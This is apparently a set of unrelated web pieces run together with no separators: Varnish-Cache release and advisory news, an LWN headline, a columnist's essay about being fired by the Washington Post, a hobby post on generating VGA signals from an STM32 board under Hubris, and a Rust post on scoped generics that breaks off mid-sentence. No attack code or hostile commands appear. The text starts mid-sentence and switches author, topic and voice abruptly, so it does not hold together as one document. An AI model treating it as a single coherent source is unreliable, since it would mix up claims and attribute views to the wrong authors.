everyone who has contributed by reporting issues, providing feedback
and, just recently, adding documentation. SLASH/fellow has also helped
improve Varnish-Cache itself.
After rigorous testing in particular over the past weeks, we now
boldly claim that SLASH/ deserves a 1.0 version tag.
The 7.1 series is no longer supported in any capacity.
2023-02-06 - Two new Storage Engines for Varnish-Cache
Celebrating the 17th anniversary of Varnish-Cache today, your Open-Source Varnish-Cache friends from UPLEX have just released an extension with two new storage engines (stevedores) and two basic storage routers (loadmasters). One of the storage engines, fellow, offers persistent storage on disks (or SSDs, rather).
We have released a Varnish Delivery Processor (VDP) for parallel ESI processing,
which can deliver relevant speedups where portions of ESI-processed objects are
not served from cache.
This combined maintenance and security release is recommended for all
users of the 6.0 LTS and contains several bug fixes, improvements and new
features. More information is available in the Change log.
2021-03-16 - Denial of Service in varnish-modules
Some versions of the separate varnish-modules bundle allow for a potential denial of service attack when the header.append() or header.copy() functions are used.
This maintenance release is recommended for all users of the 6.0 LTS
and contains several bug fixes, improvements and new features. More
information is available in the Change log.
When preparing the 6.5.0 release, it was forgotten to bump the VRT_MAJOR_VERSION number defined in the vrt.h include file. This major version bump is needed due to the API and ABI changes in the release, to make sure that VMODs cannot be used if they were compiled for the wrong Varnish version.
The official Linux (apt/yum) package repositories are now located
at Packagecloud.io.
A list of all available repositories can be found at:
https://packagecloud.io/varnishcache
You can access the varnish-cache homepages with HTTP or HTTPS as you
like.
We save the logfiles from our Varnish instance for a limited period,
in order to be able to debug problems.
We do not use any external trackers and do not analyze traffic.
[$] New kernel tools: wprobes, KStackWatch, and KFuzzTest
Linux Weekly News
lwn.net
2025-09-15 16:14:27
The kernel runs in a special environment that makes it difficult to use
many of the development tools that are available to user-space developers.
Kernel developers often respond by simply doing without, but the truth is
that they need good tools as much as anybody else. Three new tools for the
tra...
The Washington Post Fired Me – But My Voice Will Not Be Silenced
Democracy Dies in Darkness, but some of us will still carry on the light.
Last week, the Washington Post fired me.
The reason?
Speaking out against political violence, racial double standards, and America’s apathy toward guns.
Eleven years ago, I joined the Washington Post’s Opinions department with a simple goal: to use journalism in service of people.
I believed in using the pen to remember the forgotten, question power, shine light in darkness, and defend democracy. Early in my career, late Washington Post editorial page editor Fred Hiatt told me that opinion journalism is not just about writing the world as it is, but as it should be. He told me we should use our platform to do good. That has been my north star every day.
As the founding Global Opinions editor, I created a space for courageous, diverse voices from around the world — especially those exiled for speaking the truth. I was inspired by their bravery. When my writer, Global Opinions columnist Jamal Khashoggi, was brutally murdered by agents of the Saudi Arabian regime for his words, I fought loudly for justice for years, putting my life and safety on the line to pursue accountability and defend global press freedom. For this work, I was honored with global recognition, prestigious awards and proximity to the world’s most powerful people.
David Ignatius and I receiving the George Polk Award, in 2019 for commentary on Jamal Khashoggi’s murder.
In the aftermath of Jamal Khashoggi’s murder. Seated next to Jeff Bezos at the 2019 Gridiron Dinner.
As a columnist, I used my voice to defend freedom and democracy, challenge power and reflect on culture and politics with honesty and conviction.
Now, I am the one being silenced - for doing my job.
On Bluesky, in the aftermath of the horrific shootings in Utah and Colorado, I condemned America’s acceptance of political violence and criticized its ritualized responses — the hollow, cliched calls for “thoughts and prayers” and “this is not who we are” that normalize gun violence and absolve white perpetrators especially, while nothing is done to curb deaths.
I expressed sadness and fear for America.
My most widely shared thread was not even about activist Charlie Kirk, who was horribly murdered, but about the political assassinations of Minnesota lawmaker Melissa Hortman, her husband and her dog. I pointed to the familiar pattern of America shrugging off gun deaths, and giving compassion to white men who commit and espouse political violence.
This cycle has been documented for years.
Nothing I said was new or false or disparaging — it is descriptive, and supported by data.
I did my journalistic duty, reminding people that despite President Trump’s partisan rushes to judgement, no suspect or motive had been identified in the killing of Charlie Kirk — exercising restraint even as I condemned hatred and violence.
My journalistic and moral values for balance compelled me to condemn violence and murder without engaging in excessive, false mourning for a man who routinely attacked Black women as a group, put academics in danger by putting them on watch lists, claimed falsely that Black people were better off in the era of Jim Crow, said that the Civil Rights Act was a mistake, and favorably reviewed a book that called liberals “Unhumans”. In a since-deleted post, a user accused me of supporting violence and fascism. I made clear that not performing over-the-top grief for white men who espouse violence was not the same as endorsing violence against them. My only direct reference to Kirk was one post — his own words on record.
My commentary received thoughtful engagement across platforms, support, and virtually no public backlash.
And yet, the Post accused my measured Bluesky posts of being “unacceptable”, “gross misconduct” and of endangering the physical safety of colleagues — charges without evidence, which I reject completely as false. They rushed to fire me without even a conversation. This was not only a hasty overreach, but a violation of the very standards of journalistic fairness and rigor the Post claims to uphold.
I was the last remaining Black full-time opinion columnist at the Post, in one of the nation’s most diverse regions. Washington D.C. no longer has a paper that reflects the people it serves. What happened to me is part of a broader purge of Black voices from academia, business, government, and media — a historical pattern as dangerous as it is shameful — and tragic.
I am proud of my eleven years at the Post. Beyond awards and recognition, the greatest honor has been working with brilliant colleagues and connecting with readers and writers around the world. To all who have supported me, read me, even those who disagreed with me— I say, thank you. You’ve made me a better writer, thinker, and person.
But this is not the end of my work. I still believe in the power of the pen. My values have not changed.
Freedom from censorship, especially on talking about race, is why I launched the Resistance Studies Series, beginning with my independent online course Race, Media, and International Affairs 101. I created this course after Columbia’s School of International and Public Affairs cut funding for my Race and Media class. This summer, we sold out all 500 spots and funded more than 40 scholarships.
A while ago I got an ST Nucleo-H753ZI evaluation board because I wanted to try out Hubris, Oxide's embedded operating system.
After getting the basic demo app with the blinking lights running I set it aside for a lack of an idea what to do with it.
A few weeks ago I was looking through old Raspberry Pi accessories on the hunt for a project.
What stuck out to me wasn't any of the Raspberry Pi stuff, but the old 4 by 3 VGA monitor I had standing around.
Could I just wire those pins in the VGA cable up to the GPIOs and produce a signal?
As it turns out, yes you can just do that.
Getting Rid of the Sys Task
In the beginning I thought I was gonna be changing the GPIO pins from normal code, switching them on and off at very high speeds.
In Hubris there's a stm32xx-sys task that normally controls the GPIO pins and also handles enabling clocks to the different components through the Reset and Clock Control (RCC) block. So normally if you want to set a GPIO pin you'd send a message to the sys task and it would do that for you.
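Just for flavour, the IPC round-trip looks roughly like this from the client side (a sketch from memory: the task_slot! pattern is how Hubris tasks find each other, but the exact method and type names here are assumptions rather than the verified drv-stm32xx-sys-api surface):

use userlib::*;
use drv_stm32xx_sys_api as sys_api;

task_slot!(SYS, sys);

fn set_pb0_high() {
    // This call is an IPC message to the sys task, which owns the
    // GPIO (and RCC) hardware on behalf of everyone else.
    let sys = sys_api::Sys::from(SYS.get_task_id());
    sys.gpio_set(sys_api::Port::B.pin(0));
}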
I was worried that the overhead of the context switching was gonna be a problem there.
So I decided to get rid of the sys task and do it all in my task.
The Plan
My first plan was to get the screen to just display a single color.
I thought that it would be enough to get the vsync and hsync signals right and then just have the
green pin high all the time to get a green picture.
Mapping the Registers
The peripherals of our chip are all controlled with registers.
Those are memory-mapped to certain addresses.
There is a gigantic 3000 page reference manual that describes all those registers.
It's all very overwhelming.
Luckily there's a Peripheral Access Crate (PAC) that defines an API for reading and writing those registers.
Since we're running under memory protection we need to first make sure we can actually write to those registers.
In Hubris that sort of thing happens in an app.toml where all the tasks for an app are defined. In this case the tim3 memory region wasn't a thing the Hubris build system knew about yet.
The regions you can use there are defined in a chip.toml for the specific chip you have. In our case that's chips/stm32h7/chip.toml.
[tim3]
address = 0x40000400
size = 0x400
You get those values from a fun table called "Register boundary addresses" from the manual.
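The other half is letting the task use that region: in the app.toml, the task declares it in its uses list, along these lines (task name invented, and the other required task keys omitted):

[tasks.vga_demo]
uses = ["tim3"]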
Blinking an LED with a Timer / PWM
The timers on this chip have a Pulse-Width-Modulation (PWM) feature which we should be able to use to generate the VGA sync signals.
But the first step was to get a light blinking using PWM.
The basic Hubris demo app does have a blinking LED, but that's not using PWM.
Instead it uses the timer feature of the kernel, which makes a lot of sense for a Hubris demo, but we want to involve the CPU as minimally as possible for generating the signal.
My initial plan was to measure the PWM with my multimeter to see it working.
I chose PB0 for this from the pinout table in the user manual of the board (which is different from the reference manual of the chip).
PB0 is hooked up to timer 3, channel 3 (TIM3_CH3).
Looking at the "Solder bridges and jumpers" section I found out that that's also connected to an LED on the board by default, so I chose to just test it that way.
By default here means that there's a bunch of predefined places on the bottom of the board where you can make connections by adding a bit of solder or remove connections by cutting traces or removing zero ohm resistors.
So after a whole bunch of fiddling I got all the registers set up right to get the LED blinking.
Setting up the H-Sync and V-Sync Timers
The first thing I sort of used for some guidance was this site where someone had done a similar project:
https://www.programmerall.com/article/26476558/
That was pretty useful for the wiring itself and a basic understanding of how the signal works.
The basic idea is that there's three pins for red, green and blue and two pins for horizontal and vertical sync.
The horizontal sync signal needs to be on for a bit between each line of pixels and the vertical one between frames.
You can connect any of the color pins that you don't need to display to ground.
To connect the end of the cable to the GPIO headers on the board I ended up using some jumper wires and a breadboard.
(The breadboard is just for all the things connected to ground.)
I could take off the black plastic cover on the end of the jumper wires and clip off the pointy end.
That left a sort of hollow bit that I could wrap some electrical tape around and stick onto the pins of the VGA cable.
The connection is a bit loose, but it makes contact.
Before that I had tried soldering and that was a horrible idea because I don't have enough hands to hold the soldering iron, the solder and the jumper.
Then there's this site which has timing information for all the different resolutions:
http://www.tinyvga.com/vga-timing
At first I chose 640×480 because I wanted a minimal pixel count.
I got that sort of working to the point where the monitor would recognize a signal, but it would need a bit of time to auto-adjust.
I then decided I'd switch to 800×600 like they did in the link above, because those numbers add up much nicer:
http://www.tinyvga.com/vga-timing/800x600@60Hz
Each timer has a prescaler that can be used to divide the base clock, which is 200 MHz in our case.
The timer will then count up until it reaches the value in the auto-reload register (ARR).
Then there's also the capture/compare register (CCR), which determines for which part of the cycle the output is on when doing pulse-width modulation.
For hsync I set the prescaler to zero, meaning the frequency is divided by one, because that register is offset by one.
Then I set the ARR to 5279 (also offset by one) and the CCR to 640 (not offset by one).
That means the timer counts up 200 times per microsecond.
5280 / 200 gives us the 26.4 µs that we need for one line and 640 / 200 gives us the 3.2 µs for the sync pulse.
For vsync I set the prescaler to 21119.
21120 / 200 gives us 105.6 µs, which is the width our sync pulse should be.
So then we can set the CCR to 1.
The ARR is set to 156 to give us 105.6 µs * 157 = 16.5792 ms, which is exactly the time a whole frame should take.
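Putting the hsync numbers into the registers then comes down to a handful of PAC writes, roughly like this (a sketch in the svd2rust style; the exact field accessors in the stm32h7 PAC may differ, and depending on the PAC version some of the .bits() writes need an unsafe block):

// hsync on TIM3 channel 3: 200 MHz timer clock, 5280 counts per line,
// 640 counts of sync pulse.
let tim3 = unsafe { &*pac::TIM3::ptr() }; // `pac` stands in for the PAC crate
tim3.psc.write(|w| w.psc().bits(0));    // prescaler 0 + 1 = divide by 1
tim3.arr.write(|w| w.arr().bits(5279)); // period: 5279 + 1 counts = 26.4 µs
tim3.ccr3.write(|w| w.ccr().bits(640)); // pulse width: 640 counts = 3.2 µs
tim3.ccmr2_output().modify(|_, w| w.oc3m().pwm_mode1()); // channel 3 in PWM mode 1
tim3.ccer.modify(|_, w| w.cc3e().set_bit()); // enable the channel output
tim3.cr1.modify(|_, w| w.cen().set_bit());   // start the counter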
All Green all the Time Not Working
My hope was that I could get to a fully green picture pretty easily by just hooking up the green pin to a GPIO pin that was on.
That ended up not working, I suspect because the monitor uses the voltage that's on the color pins during the h-sync as a baseline or something like that.
DMA to the DAC
The next plan was to continuously repeat a single line.
I decided to try to use the Digital-to-analog converter (DAC) for this.
The basic way the DAC works is that you first need to set a GPIO pin that's hooked up to the DAC into an analog mode.
This isn't one of the alternate functions like you'd use for the timer, but a whole separate mode.
Then there's a data holding register you can write an 8 or 12 bit value into.
That will determine the output voltage you get on the pin.
Now, we don't want to keep the CPU fully occupied with constantly setting that register, so we need a better solution.
Luckily the h7 has dedicated units for copying memory around.
There's actually at least four different kinds of these, but we'll start with a "normal" direct memory access controller (DMA).
There's two of those, but we'll use DMA1.
When I wanted to map the DAC control registers into my task I got a build error.
As it turns out, the memory protection unit only supports eight memory regions at a time, meaning per-task in Hubris.
I resolved that by grouping some timers together.
They also need to have a power-of-two size and be aligned to their size, which would lead to problems later when I tried to group more things together, but it worked out for the timers.
What I ended up doing here is hooking up the timer to the DAC and configuring the DMA request multiplexer (DMAMUX) to be triggered by the DAC.
Then I set up the DMA in circular mode with a pointer to a buffer.
Eventually I got it looking like that (with a lot of flickering of course):
Now that wasn't looking very much like the data that I wanted to DMA into the DAC.
It was also changing quite a bit based on what exactly the code around it did (like adding something to a debugging ringbuffer).
It appears that the DMA unit doesn't go through the CPU caches, so likely this was some random data.
After some digging I found out that there's different kinds of memory on this chip that are configured differently in Hubris.
You can see that configuration in chips/stm32h7/memory-large.toml. Among others there's a dma flag that can be set for a region. I'm not sure what that does exactly (it looks like one thing is that the kernel will refuse to copy from or to there), but putting my buffer there using the link_section attribute seems to make our DMA work.
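Concretely that looks something like this (the section name is whatever your chosen region is called in the linker script, so treat ".dma_buffer" as an assumption):

// Place the buffer in a region that memory-large.toml marks with the
// dma flag, so the DMA controller sees the same bytes as the CPU.
#[link_section = ".dma_buffer"]
static mut LINE_BUFFER: [u8; 132] = [0; 132];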
After I got that to work all that was left was a lot of confusion because I had gotten the math for the pixel timing wrong.
But after I had figured that out I was able to produce a nice gradient.
(If you're confused about the color: I had switched to blue instead of green at some point.)
Switching between on and off pixels leads to a pattern like this:
The DAC seems unable to produce sharp edges and also the average output seems to get higher after switching on and off a couple of times.
Here they used the SPI hardware support to produce an image, so maybe I should try that next as well.
Return of the Sys Task
The next thing I wanted to do of course was to produce an actual two-dimensional image.
So far the CPU hadn't been involved after setting up the registers.
The DMA would keep going even if the CPU was halted.
This starts to become a problem for a 2D image though.
If we were to keep our circular mode buffer and wanted to store a whole image in it we'd need a bunch of bytes for that.
While we can horizontally repeat the same pixel 8 times (by decreasing the timer frequency), we can't do that vertically.
So we'd need 132 (1056 / 8) × 628 = 82896 bytes for that buffer.
That would fit into one of the sram regions, but it's a bit of an inconvenient format for a framebuffer with vertical pixels being 8 times smaller than horizontal ones.
Luckily there's the master direct memory access controller (MDMA), which can be triggered by the completion of other DMA controllers and supports much more complex
configuration.
But at this point I was definitely out of regions that could be mapped to my task.
Since it was very clear at this point that we weren't going to do high speed GPIO toggling on the CPU we could actually re-introduce the sys task.
This means that we could get rid of two regions from our task (RCC and GPIO) and we'd have space for the MDMA control registers.
It's kind of funny how this hardware limitation can encourage splitting things into different tasks.
I was able to get the MDMA copying into the DMA buffer, but I haven't quite been able to get a framebuffer working yet.
So this is the end of this post.
I hope I'll find some more time for this project soon and I'll try to make another post if I get something more interesting going.
I already have some ideas about what to do with a working framebuffer.
In my previous blog post, about scoped generics, I
identified a problem with the Rust programming language that couldn't properly
be solved by existing programming techniques, implying that a new language
feature was needed. As such, I've been intending to officially propose that
scoped generics should be added to Rust. This blog post isn't primarily about
the particular new feature itself: rather, it's partially about the process of
working out the details of a new feature in general, but primarily about some
interesting things I discovered along the way.
I care a lot about getting the details right for my new feature, both because it
increases the chance that the feature will be accepted, and because it increases
the chance that the feature will be useful if it is accepted. The Rust language
design team are frequently in a similar situation, and in order to try to get
the details of new features right, they use an "experimental feature gate" process that lets
them implement something experimentally to find out whether or not it's a good
idea and what the details should be. I'm not an experienced Rust contributor,
so I don't get to use that process myself: but that doesn't mean that I can't
try to do something similar on my own. It should be possible to learn lessons
from trying to implement something whether or not the implementation is in the
official Rust compiler repository!
As such, I've already started on an experiment into implementing scoped
generics. It isn't completed yet, but it's already taught me things, not just
about scoped generics, but about Rust in general. And one of those insights
about Rust in general seemed both fundamental enough, and surprising enough, to
make me stop what I was doing and write this blog post instead.
The insight is about a phenomenon that will be very familiar to most Rust
programmers: "a large proportion of the functions, methods, and even sometimes
types in the Rust standard library have to be written twice: one version that is
or operates on shared references, and one version that is or operates on mutable
references", and comes in two parts:
For functions/types/methods that do have to be written twice, there is a
mechanical translation that can be used to produce the "shared reference"
version based on the "mutable reference" version; and
The translation in question has a well-established mathematical structure:
it follows the type theory of linear logic (a mathematical tool invented in
1987 and that has frequently been used since to explain programming language
type systems). But this isn't the normal programming-language use of linear
logic: most programming language type theories are limited to a "fragment"
of linear logic that contains some of the operations and not others, and the
translation in question falls outside the commonly used fragments.
My primary aim with writing this blog post is to try to explain: a) the relevant
parts of Rust, b) all the relevant parts of linear logic (which is almost all of
it) as seen from a programming-language point of view, and c) how they relate to
each other. Hopefully the insights will make Rust easier to reason about, or
maybe even reduce some of the shared/mutable duplication that Rust seems to
struggle with.
And along the way, we might do more than a little copying of things that you
aren't supposed to Copy.
Starting the experiment
First, a quick summary of what I'm trying to do, for those who haven't read the
previous blog post. In Rust, a "const generic" is a way to parameterise a type
using a number that's a compile-time constant: for example, a Rust "array" (as
opposed to a "slice" or "vector") has a length known at compile time, with types
like [i32; 4] (an array of 4 32-bit integers) and [i32; 8] (an array of 8
32-bit integers) being different because the const generic is different. Scoped
generics let you do something similar with values that aren't compile-time
constants (and might not be numbers), under the conditions that a) the type
parameter is stored in a variable and b) all values of types parameterised by
the variable must be discarded before the variable goes out of scope or has its
value change. The conditions mean that the parameter is "effectively constant"
from the point of view of values of the type (because the value will be gone by
the time the parameter changes); unlike const generics (which use a compile-time
check for equal values to see whether two parameters are the same), two
scoped-generic parameters are considered the same (for the purpose of checking
whether types containing them are the same) by checking to see whether they are
stored in the same variable.
One advantage of experimenting with how a new language feature might work is
that you don't need to come up with a finished implementation immediately. For
the purpose of an experiment, a) it's OK if the syntax isn't very good, and b)
it's OK if the feature doesn't work in all cases, as long as it works in enough
practically useful cases to get an idea of how it would work in practice.
Additionally, I've never built the Rust compiler myself, and my computer
probably doesn't have enough memory or free disk space to do so. That pointed
me towards trying to do my experiment by writing a new library, rather than
trying to change the compiler: I wouldn't be able to implement every aspect of
the feature, and the syntax would be worse, but it'd be easier and produce
results faster.
It also allowed me to not bother with trying to work out a case that would
otherwise be very hard to implement: scoped generics are a sort of
type-system-level reference to local variables, which means that a full/final
implementation of them would support the same scoping behaviour as local
variables do (meaning that if a function containing a scoped variable runs
recursively, each level of recursive calls creates its own scoped generic). For
the purpose of my experiment, I decided to instead use a less general
implementation (especially because the full version may be unimplementable in
present Rust): storing, at every location in the program which uses a local
variable as a scoped generic, a reference to the local variable into a global
variable specific to that location (and representing the scoped generic as a
Rust type that hard-codes a reference to the global variable). This is not
re-entrant, i.e. it doesn't work properly in the presence of multi-threaded or
recursive code, which would make it an inappropriate final implementation for
the language feature; but it's fine for experimental purposes, because there are
plenty of single-threaded non-recursive programs which would find the feature
useful and could be used to evaluate it.
Representing the scoped generic as a Rust type lets Rust's existing type checker
do the type-checking (as it already knows how to check whether type parameters
are the same), so that's a huge amount of code that doesn't need writing for the
experiment. Some code is still needed, though: it's necessary to implement the
rule that values of types that use the scoped generic can't outlive the value of
the scoped generic, and to implement a way to get at the value of the generic
parameter (but only within its lifetime). Both of those are tied to the same
lifetime, meaning that the type that needs implementing is "something that has a
lifetime and that can provide access to the value in a given global variable
during that lifetime". I'll call a value of such a type a "Thing A".
A Thing A is almost sufficient to implement scoped generics simply by a)
embedding it in the type that has the generic and b) parameterising the type on
what specific type of Thing A we have (because each one is tied to a different
global variable). The only things it can't do are a) be initialised correctly
in code that's used re-entrantly, and b) implement traits like
Default with
methods that aren't based on an existing value. But it's close enough to
evaluate the feature and see if any lessons are learned about it.
So what is a Thing A? It has a lifetime; during that lifetime, it lets you get at the value stored in something; and it probably has to be Copy (otherwise you couldn't embed it in other Copy things). It can't be Send unless the thing it references is Sync, otherwise you'd have a trivial soundness bug. So far, this sounds an awful lot like a Rust shared reference. But, it also has to have zero size (part of the purpose of scoped generics is to allow a large number of objects to all reference the same thing without using extra memory per-object), which Rust shared references don't (they're represented as pointers). So a Thing A is a… manually implemented?… shared reference that hard-codes the address (rather than containing a pointer).
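As a minimal sketch of the idea (my own illustration, not the experiment's actual code), a Thing A for one specific global might look like this:

use core::marker::PhantomData;
use core::ops::Deref;

static SLOT: i32 = 42; // stand-in for the real global (which is a cell)

// Zero-sized and Copy: no pointer is stored anywhere.
#[derive(Clone, Copy)]
struct ThingA<'a>(PhantomData<&'a ()>);

impl<'a> Deref for ThingA<'a> {
    type Target = i32;
    fn deref(&self) -> &i32 {
        &SLOT // the address is hard-coded, not read from a field
    }
}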
So far, so good. Once my reasoning reached this point, I set out to manually
implement shared references – basically aiming to replicate Rust's existing
shared references, except with a hard-coded address – and also to implement the
code that stored values in global variables in a sound way (i.e. checking that
the code isn't being used re-entrantly). And that's when I started learning
things.
Lots and lots of references
This blog post is really about the "manually implementing shared references",
but it'll be easier to understand the problems that arose by first starting with
the code for storing into the global variable. When we enter the scope of the
scoped generic, we need to assign a value to it. But we're writing in Rust,
where you can't "just" assign to global variables whenever you like, because
that would frequently be unsound. Instead, you need to give the global variable
a cell type (i.e. a type that permits writes even if you don't have a mutable
reference), using that cell type's rules for writes in order to prove safety.
(Early Rust did let you write to global variables directly in unsafe blocks, and this is still supported for backwards compatibility, but nowadays it is preferable to use UnsafeCell: it supports the same operations, but with an API that is more consistent with the rest of the language.)
There are only three potentially viable options for this type of cell in the
Rust standard library:
Mutex. The semantics of this are fine, but it has the major issue that to use this efficiently, we'd somehow need to create a zero-sized reference to the MutexGuard (which would be a non-global value borrowed at runtime), and I don't know of a solution to that problem other than scoped generics, which sadly can't be used to implement themselves. There's an inefficient solution which involves locking the Mutex every time the value is accessed, but that seems like far too much overhead even for an experiment. (There's also the more minor issue that a type system feature should work in #[no_std] code, which would rule out mutex-based implementations for the final version of the feature, but they would probably be OK while experimenting.)
AtomicPtr. This is a little semantically awkward because it doesn't remember the lifetime, so we'd have to track the lifetimes manually, which is easy to get wrong. It almost works, though – as long as we're storing a reference to a Sized object. Storing a reference is fine (it's just one level of indirection), but the Sized requirement seems unnecessary, and part of the purpose of an experiment is to determine what restrictions are needed, so experiments should aim to avoid incurring restrictions unless they can see how a non-experimental version of the feature would be able to avoid them. (While writing this, it crossed my mind that the Sized requirement could be avoided with a second level of indirection, but I don't like to use two levels of indirection for something that shouldn't require them.)
UnsafeCell. Can store anything (which is perfect for our purposes) but can't soundly be used re-entrantly. We weren't planning to use it re-entrantly anyway, though, so that makes a perfect fit. For soundness, the code does need to check that it isn't being used re-entrantly, but that's easy to implement: a single AtomicBool to see whether the UnsafeCell is currently in use is enough for the check, together with a MutexGuard-like object (that can be zero-sized) to remember that the check succeeded.
UnsafeCell looks like the best option here: it just needs to be wrapped into a safe abstraction that ensures it isn't being concurrently accessed, panicking if an attempt to use it for a second purpose is made while it's still in use for the first. The resulting abstraction has almost identical semantics to RefCell, except that it's Sync, which gives the fairly obvious name SyncRefCell. (I suspect that the Rust standard library doesn't provide the abstraction in question, even though it's sound, because attempting to use it in multi-threaded code would panic whenever there was contention, and if something is almost unusable in multi-threaded code there's no real purpose to making it Sync. But global variables have to be Sync, so I needed the new abstraction.)
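A minimal sketch of that abstraction, with names and details of my own invention:

use core::cell::UnsafeCell;
use core::sync::atomic::{AtomicBool, Ordering};

struct SyncRefCell<T> {
    in_use: AtomicBool,
    value: UnsafeCell<T>,
}

// SAFETY (sketch-level): every access is funnelled through the atomic
// flag below, so two threads can never touch the UnsafeCell at once.
unsafe impl<T: Send> Sync for SyncRefCell<T> {}

impl<T> SyncRefCell<T> {
    const fn new(value: T) -> Self {
        Self { in_use: AtomicBool::new(false), value: UnsafeCell::new(value) }
    }

    fn with_mut<R>(&self, f: impl FnOnce(&mut T) -> R) -> R {
        // Panic on contention or re-entrant use, rather than block.
        if self.in_use.swap(true, Ordering::Acquire) {
            panic!("SyncRefCell is already in use");
        }
        // SAFETY: the flag gives us exclusive access until we clear it.
        let result = f(unsafe { &mut *self.value.get() });
        self.in_use.store(false, Ordering::Release);
        result
    }
}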
Now, let's see what would have to be done to manually implement a (zero-sized) shared reference to the inside of a SyncRefCell (and I'm going to start counting the number of different reference-like types that are needed). First, we need a way to get from a zero-sized object to the address of the outside of the cell (1): that's just a zero-sized type whose Deref implementation returns a reference to the global variable. Next, we need a way to get from the outside to the inside of the cell (2): that needs a zero-sized structure that both lets us access the inside of the cell, and remembers that "we own the cell" (the reference that owns the cell should be able to read and write it, but other references to the cell should cause a panic, so we need a type to remember the difference). This is basically the same sort of thing as MutexGuard or cell::RefMut from the standard library, and is fairly straightforward to implement: we just need to embed one of the zero-sized references-to-the-outside in it, in addition to some fairly standard PhantomData-for-lifetime. However, this type needs a destructor (to unlock the cell once it's no longer referenced), meaning that it's unsound to copy it (or the destructor would run twice) and thus is only usable as a mutable reference to the inside. So yet another type is needed to represent a share of the MutexGuard equivalent (3): it has the same semantics as a shared reference to a type 2, except that a) it's zero size and b) there isn't an extra layer of indirection in the Deref implementation.
OK, so the next problem is: what type do we put inside the UnsafeCell? We want it to be able to hold references, and when doing that, the type of the reference is mostly known but we don't know the lifetimes (because if code that creates a scoped generic runs in a loop, it could be referencing a different object each time, with disjoint lifetimes, and so the lifetimes will be different). Back when I wrote my previous blog post, I thought that this particular sticking-point would render the global-variable technique non-viable, but there is a solution: references which are the same apart from lifetimes (of the reference itself and of the type they reference) have the same size and alignment, so you can create a block of uninitialised memory (of the right size and alignment) and interpret it as the various different possible types by transmuting it. (In fact, if you know that nobody else is using the block of memory in question, you can even transmute it in safe code, because an uninitialised instance of one type is clearly safe to interpret as an uninitialised instance of another type with the same size/alignment in that case.) So, what's needed is a MaybeUninit containing some pointer-sized memory. We need to be able to create a "transmuted reference" to it that interprets it as a MaybeUninit of some particular type (4). Then we need to track the fact that it's been initialised (to be able to dereference it soundly), so we need a MutexGuard-like reference to it that records the fact that it's initialised (5). To create the original zero-sized references, each of them will need to be able to embed the guard-like reference, which means that we need a copiable version that can't mutably dereference (6); and when trying to implement those, we discover that those need to embed a type 4, except type 4 clearly can't be copied because it relies on exclusive access to make the transmute safe, so we need a copiable version of that without the ability to write through it (7). (A type 7 can do the transmute safely because it knows that all other coexisting uses of the memory access it via the same transmute.)
And once we have all that, all we need is a zero-sized reference that embeds a type 6 and dereferences it twice to get at the object we're actually trying to reference (8), and that's the Thing A that makes it possible to implement scoped generics. It would be possible to write a mutable version of that too, but I didn't need it for anything and had become tired of writing implementations of references.
And that's the point at which a good programmer should start thinking. By now
I'd written very similar code 8 times, with only minor variations, and some of
the thoughts this should prompt are (from least useful to most useful):
Can I get my editor to automate this?
Can I write a macro to automate this?
Can I write a library that handles this?
Can I change the design so that doing this isn't necessary?
Can I improve the programming language I'm using so that doing this isn't
necessary?
(What you shouldn't do: you shouldn't try to get an AI coding assistant to automate it. Even in the general case, this makes the code less maintainable in the future because you don't have any reliable instructions you can write down in case you need to do the same task again in the future, and because it leads to code which is less readable and less editable because it ends up writing out the repetitive/equal parts every time, rather than storing them all in a common location. In this specific case, it would be even worse, because this contains some unsafe code which is somewhat subtle with respect to lifetimes: getting it wrong would cause the resulting code to be unsound and would be difficult to discover through testing, because you'd need to write a separate compile_fail test for every possible case where a lifetime might be longer than it should be and I don't even know how to enumerate those.)
In general, the options towards the end of the list are better than the options
towards the start of the list, as they a) increase the ability that the compiler
has to verify that the code is correct, b) reduce the amount of effort
needed for future maintenance on the code, and c) might even help out unrelated
code in the future (perhaps written by other people).
But to do any of those actions, you need to know the pattern, and I'd now manually written enough implementations of references to get a pretty clear view of it. The same pattern appeared to apply to a) writing a Deref implementation given the DerefMut implementation, and b) implementing a shared reference given a mutable reference. The basic idea seemed to be to replace all mutable references with the equivalent shared references, remove destructors and side-effecting constructors (and other side-effecting methods), convert method calls from their mutable to shared versions (e.g. assume_init_mut became assume_init_ref), and add a way to obtain the shared reference from a shared borrow of the corresponding mutable reference (via converting every field recursively from mutable to shared, and copying the result to produce a field of the shared reference).
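To make the pattern concrete, here's a toy version of it (all names invented; the real types in the experiment are the cell guards described earlier):

// The mutable version, as you'd write it first.
struct GuardMut<'a> {
    slot: &'a mut i32,
}

impl<'a> GuardMut<'a> {
    fn get_mut(&mut self) -> &mut i32 {
        &mut *self.slot
    }
}

// The shared version the translation produces: mutable references become
// shared ones, mutating methods disappear, and the result is Copy.
#[derive(Clone, Copy)]
struct GuardRef<'a> {
    slot: &'a i32,
}

impl<'a> GuardRef<'a> {
    fn get(&self) -> &i32 {
        self.slot
    }
}

impl<'a> GuardMut<'a> {
    // The bridge: a shared borrow of the mutable version yields the shared
    // version, converting each field and copying the result.
    fn as_shared(&self) -> GuardRef<'_> {
        GuardRef { slot: &*self.slot }
    }
}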
This looks a lot like a missing language feature: it looks almost like we should
be able to call many methods that take a mutable reference but give them shared
references, and get shared references rather than mutable references in the
result. But, that would almost certainly be unsound if implemented as-is, maybe
in subtle ways. (For example, an UnsafeCell can safely be read through a &mut UnsafeCell reference, but needs extra safety checks to soundly read it through the corresponding &UnsafeCell reference – the former is an exclusive reference and thus guarantees that nobody else is writing the UnsafeCell at the time, whereas an &UnsafeCell doesn't make any guarantee about who might be writing the contents because the guarantees Rust usually provides for & references don't apply inside cells.)
I wouldn't blame anyone for giving up at this point (or indeed earlier), but I'm
the sort of person who likes to keep going along this line of investigation. I
wanted to know: just when is it sound to do this sort of mutable-to-shared
replacement? And in order to work that out, I would need to discover the type
theory that explains what's going on.
"You can't have two mutable references to the same object"
It's time for another experiment, but this time it's a thought experiment. If
Rust supported a general way to convert mutable reference implementations to
shared reference implementations, it would presumably work on Rust's actual
mutable reference implementation, &'a mut T, too: instead of needing mutable
and shared references to exist, we'd just need mutable references and an
automatic reference converter. That means that we'd, somehow, have a version of
Rust that managed to make things work without "natively" having shared
references at all. And one of the best ways to find out how to do something is
to try to prove it impossible, and see where the proof breaks down: the gap in
the proof is the solution you were looking for.
The most obvious impossibility is: it's possible to have two shared references
to the same object (and use both concurrently), and if you couldn't do that,
most Rust programs would be impossible to write. But one of the most
fundamental rules of Rust is that you can't have two mutable references to the
same object. Rust's aliasing rules aren't fully decided yet, but surely that
one is the most important of all and couldn't possibly have exceptions.
Still, there isn't much to do here but try. I was once watching someone play a
